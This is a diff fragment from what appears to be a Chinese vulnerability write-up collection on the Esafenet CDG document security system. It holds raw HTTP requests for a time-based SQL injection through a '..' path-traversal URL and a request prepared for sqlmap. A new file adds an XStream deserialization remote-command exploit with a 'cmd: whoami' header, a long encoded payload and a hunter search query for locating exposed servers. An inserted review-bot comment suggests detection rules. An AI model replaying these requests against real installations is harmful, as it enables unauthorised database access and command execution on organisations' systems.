text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +id=1';WAITFOR DELAY '0:0:3'-- +``` + +![1706846059605-f7ed0a2e-dbb7-44ef-9c48-e5b0f1a2f537.png](./img/y6kVJz2P66ut0NRz/1706846059605-f7ed0a2e-dbb7-44ef-9c48-e5b0f1a2f537-509400.png) + +sqlmap + +```plain +POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +id=1 +``` + 
+![1706846164296-703acde3-d5a8-4c72-9488-6605e2983e68.png](./img/y6kVJz2P66ut0NRz/1706846164296-703acde3-d5a8-4c72-9488-6605e2983e68-116124.png) + +[亿赛通电子文档安全管理系统-uploadfiletocatalog-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621695023-2321bd4d-69db-4840-bf2c-1e878213aca0.yaml) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bxi5rg5edb19fsou> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UserLoginOutService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UserLoginOutService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..ae2e1cb --- /dev/null +++ b/亿赛通电子文档安全管理系统UserLoginOutService1存在xstream反序列化漏洞.md 
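Review bot: both raw requests under UploadFileToCatalog have an empty `Host:` header and no `Content-Length`, so they are not replayable as written; fill in a placeholder host and the length, and either explain what the second request under the bare `sqlmap` heading (which has no command line or text) is for or drop it. The `id=1';WAITFOR DELAY '0:0:3'--` probe is a blind, time-based check, so the write-up should state the observable it expects (a roughly 3 s delay compared with the unmodified `id=1` request) instead of relying on the screenshot alone. For detection, note that the path `/CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp` reaches the `policy` servlet through a `..` segment, so rules should match on the normalised path and flag `..` in request URIs to this application.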
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统UserLoginOutService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统UserLoginOutService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/SycXQUY9DRCNi_Jk/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-439646.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/UserLoginOutService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCA
MMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNP
KCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCC
DECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLL
OKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNP
PPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJ
BJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCO
GDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCD